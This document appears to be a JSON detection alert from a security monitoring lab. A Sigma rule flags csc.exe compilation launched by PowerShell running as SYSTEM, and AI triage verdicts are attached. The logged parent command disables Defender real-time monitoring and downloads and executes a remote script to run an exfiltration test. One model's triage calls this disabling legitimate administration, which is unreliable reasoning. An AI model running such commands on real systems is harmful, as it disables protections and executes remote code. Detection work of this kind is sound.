{
  "author": "_ext-sigma-7a14fbc3-54d9-4b4d-8700-61eddada04f0[bulk][segment]",
  "cat": "Dynamic .NET Compilation Via Csc.EXE",
  "detect": {
    "event": {
      "COMMAND_LINE": "\"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe\" /noconfig /fullpaths @\"C:\\Windows\\TEMP\\halw3xob\\halw3xob.cmdline\"",
      "FILE_IS_SIGNED": 1,
      "FILE_PATH": "C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe",
      "HASH": "f571b3feaebc562d846aaeab907243ab1f8805610543b21c8fb9844a626c1841",
      "MEMORY_USAGE": 36864,
      "PARENT": {
        "BASE_ADDRESS": 140694944940032,
        "COMMAND_LINE": "PowerShell.exe  Set-ExecutionPolicy Unrestricted ; [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 ; Install-PackageProvider -Name NuGet -MinimumVersion 2.8.5.201 -Force; Set-MpPreference -DisableRealtimeMonitoring $true ; IEX (IWR \u0027https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/install-atomicredteam.ps1\u0027 -UseBasicParsing) ; Install-AtomicRedTeam -Force -getAtomics; Invoke-AtomicTest T1567.003 -CheckPrereqs ; Invoke-AtomicTest T1567.003 -GetPrereqs ; Invoke-AtomicTest T1567.003 ",
        "FILE_IS_SIGNED": 1,
        "FILE_PATH": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
        "HASH": "de96a6e69944335375dc1ac238336066889d9ffc7d73628ef4fe1b1b160ab32c",
        "MEMORY_USAGE": 143122432,
        "PARENT_ATOM": "45e4e3418a6f8c858f274b1569c2a828",
        "PARENT_PROCESS_ID": 7640,
        "PROCESS_ID": 3268,
        "THIS_ATOM": "59a8d473d7fb33057005984369c2a82b",
        "THREADS": 33,
        "TIMESTAMP": 1774364713278,
        "USER_NAME": "NT AUTHORITY\\SYSTEM"
      },
      "PARENT_PROCESS_ID": 3268,
      "PROCESS_ID": 6576,
      "USER_NAME": "NT AUTHORITY\\SYSTEM"
    },
    "routing": {
      "arch": 2,
      "did": "",
      "event_id": "5272e739-0a19-47ad-8bc5-4a6f1b9b8e28",
      "event_time": 1774364714271,
      "event_type": "NEW_PROCESS",
      "ext_ip": "67.60.122.240",
      "hostname": "df-labsdc01.dflabs.local",
      "iid": "47501359-645e-4049-906e-e6195da7afcf",
      "int_ip": "192.168.45.129",
      "latency": 2112,
      "moduleid": 2,
      "oid": "ad19afae-3759-4207-b06e-8648b225c455",
      "parent": "59a8d473d7fb33057005984369c2a82b",
      "plat": 268435456,
      "sid": "e4a1c62d-4d1f-4472-bae4-43291246b4d4",
      "tags": [
        "domain-controller",
        "fusion-soc-alert",
        "fusion-soc-case",
        "fusion-soc-pulled",
        "fusion-soc-triage"
      ],
      "this": "7a964627b5d19a2e685d1e0869c2a82b"
    }
  },
  "detect_id": "c49327cf-6ac3-4026-b29d-852569c2a82c",
  "detect_mtd": {
    "author": "Florian Roth (Nextron Systems), X__Junior (Nextron Systems)",
    "description": "Detects execution of \"csc.exe\" to compile .NET code. Attackers often leverage this to compile code on the fly and use it in other stages.",
    "falsepositives": [
      "Legitimate software from program files - https://twitter.com/gN3mes1s/status/1206874118282448897",
      "Legitimate Microsoft software - https://twitter.com/gabriele_pippi/status/1206907900268072962",
      "Ansible"
    ],
    "level": "medium",
    "references": [
      "https://securityboulevard.com/2019/08/agent-tesla-evading-edr-by-removing-api-hooks/",
      "https://www.clearskysec.com/wp-content/uploads/2018/11/MuddyWater-Operations-in-Lebanon-and-Oman.pdf",
      "https://app.any.run/tasks/c6993447-d1d8-414e-b856-675325e5aa09/",
      "https://twitter.com/gN3mes1s/status/1206874118282448897",
      "https://github.com/redcanaryco/atomic-red-team/blob/b27a3cb25025161d49ac861cb216db68c46a3537/atomics/T1027.004/T1027.004.md#atomic-test-1---compile-after-delivery-using-cscexe"
    ],
    "tags": [
      "attack.defense-evasion",
      "attack.t1027.004"
    ]
  },
  "gen_time": 1774364716389,
  "link": "https://app.limacharlie.io/orgs/ad19afae-3759-4207-b06e-8648b225c455/sensors/e4a1c62d-4d1f-4472-bae4-43291246b4d4/timeline?time=1774364714\u0026selected=7a964627b5d19a2e685d1e0869c2a82b",
  "namespace": "general",
  "routing": {
    "arch": 2,
    "did": "",
    "event_id": "5272e739-0a19-47ad-8bc5-4a6f1b9b8e28",
    "event_time": 1774364714271,
    "event_type": "NEW_PROCESS",
    "ext_ip": "67.60.122.240",
    "hostname": "df-labsdc01.dflabs.local",
    "iid": "47501359-645e-4049-906e-e6195da7afcf",
    "int_ip": "192.168.45.129",
    "latency": 2112,
    "moduleid": 2,
    "oid": "ad19afae-3759-4207-b06e-8648b225c455",
    "parent": "59a8d473d7fb33057005984369c2a82b",
    "plat": 268435456,
    "sid": "e4a1c62d-4d1f-4472-bae4-43291246b4d4",
    "tags": [
      "domain-controller",
      "fusion-soc-alert",
      "fusion-soc-case",
      "fusion-soc-pulled",
      "fusion-soc-triage"
    ],
    "this": "7a964627b5d19a2e685d1e0869c2a82b"
  },
  "rule_tags": [
    "ext:ext-sigma",
    "attack.defense-evasion",
    "attack.t1027.004"
  ],
  "source": "ad19afae-3759-4207-b06e-8648b225c455.47501359-645e-4049-906e-e6195da7afcf.e4a1c62d-4d1f-4472-bae4-43291246b4d4.10000000.2",
  "source_rule": "service.windows_process_creation/proc_creation_win_csc_susp_dynamic_compilation",
  "ts": 1774364716000
}

{
  "virustotal": {
    "malicious": false,
    "provider": "virustotal",
    "reputation": -1,
    "stats": {
      "confirmed-timeout": 0,
      "failure": 0,
      "harmless": 0,
      "malicious": 0,
      "suspicious": 0,
      "timeout": 0,
      "type-unsupported": 4,
      "undetected": 72
    }
  }
}

{
  "confidence": 0.825,
  "false_positive_reason": "csc.exe is a legitimate Microsoft .NET compiler located in its expected directory and signed by Microsoft. The dynamic compilation behavior is consistent with legitimate development scenarios, not necessarily malicious activity.",
  "investigation_questions": [
    "What user initiated the PowerShell script that spawned csc.exe?",
    "Is there a scheduled task or service running this PowerShell command?",
    "Has this specific PowerShell script been executed previously on this host?"
  ],
  "ioc_analysis": "The csc.exe binary is located at C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe, which is the known-good location for Microsoft\u0027s .NET compiler. The file is signed (FILE_IS_SIGNED: 1) and matches the expected hash for legitimate Microsoft binaries. While the command line shows dynamic compilation via a temp file, this behavior is consistent with legitimate .NET development or deployment scenarios where PowerShell scripts compile code on-the-fly.",
  "iocs_extracted": [
    {
      "type": "file_path",
      "value": "C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe"
    },
    {
      "type": "hash",
      "value": "f571b3feaebc562d846aaeab907243ab1f8805610543b21c8fb9844a626c1841"
    },
    {
      "type": "command_line",
      "value": "\"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe\" /noconfig /fullpaths @"
    }
  ],
  "mitre_techniques": [
    "T1567.003"
  ],
  "recommended_actions": [
    "Manual analyst review required \u2014 AI models (split)",
    "Verify the PowerShell script source and ensure it is from a trusted administrative account",
    "Review the security policy changes being made (DisableRealtimeMonitoring) to assess risk",
    "Monitor for subsequent suspicious processes or network connections from this session"
  ],
  "risk_score": 50,
  "severity": "high",
  "summary": "**Vote: SPLIT (1/2 -\u003e SUSPICIOUS)**\n\n### \u264a gemini-cli Analysis (Primary)\nFailed or timed out.\n\n---\n\n### \ud83e\udd16 qwen3.5:4b Analysis (Secondary)\n**Verdict:** false_positive | **Confidence:** 0.95\nThe detection of csc.exe dynamic compilation is a false positive because the process is running from its expected location in Microsoft\u0027s .NET Framework directory and is signed by Microsoft. The parent process PowerShell is executing legitimate administrative commands including disabling real-time monitoring, which indicates a potential security misconfiguration rather than active malware execution.\n\n**IOC Analysis:** The csc.exe binary is located at C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe, which is the known-good location for Microsoft\u0027s .NET compiler. The file is signed (FILE_IS_SIGNED: 1) and matches the expected hash for legitimate Microsoft binaries. While the command line shows dynamic compilation via a temp file, this behavior is consistent with legitimate .NET development or deployment scenarios where PowerShell scripts compile code on-the-fly.\n\n---\n\n### \ud83e\udd16 deepseek-r1:8b Analysis (Secondary)\n**Verdict:** suspicious | **Confidence:** 0.7\nThe detection involves a legitimate csc.exe process from the .NET Framework, but it is being used for dynamic compilation, which could indicate malicious intent. The parent process is PowerShell running as SYSTEM, suggesting elevated privileges and potential for unauthorized actions.\n\n**IOC Analysis:** The FILE_PATH is located in C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\, which is a known-good location for legitimate .NET Framework binaries. The binary is signed (FILE_IS_SIGNED: 1), making it likely a Microsoft-signed system component. However, the command line indicates dynamic compilation from a temporary file, and the context of the parent process (PowerShell as SYSTEM) raises suspicion for potential malicious code generation.",
  "verdict": "suspicious",
  "voting": {
    "auto_action": "manual_review",
    "mode": "split",
    "total_models": 2,
    "vote_summary": [
      "qwen3.5:4b: false_positive (high, 95% confidence)",
      "deepseek-r1:8b: suspicious (high, 70% confidence)"
    ],
    "votes": [
      {
        "confidence": 0.95,
        "model": "qwen3.5:4b",
        "verdict": "false_positive"
      },
      {
        "confidence": 0.7,
        "model": "deepseek-r1:8b",
        "verdict": "suspicious"
      }
    ],
    "winning_count": 1,
    "winning_verdict": "suspicious"
  }
}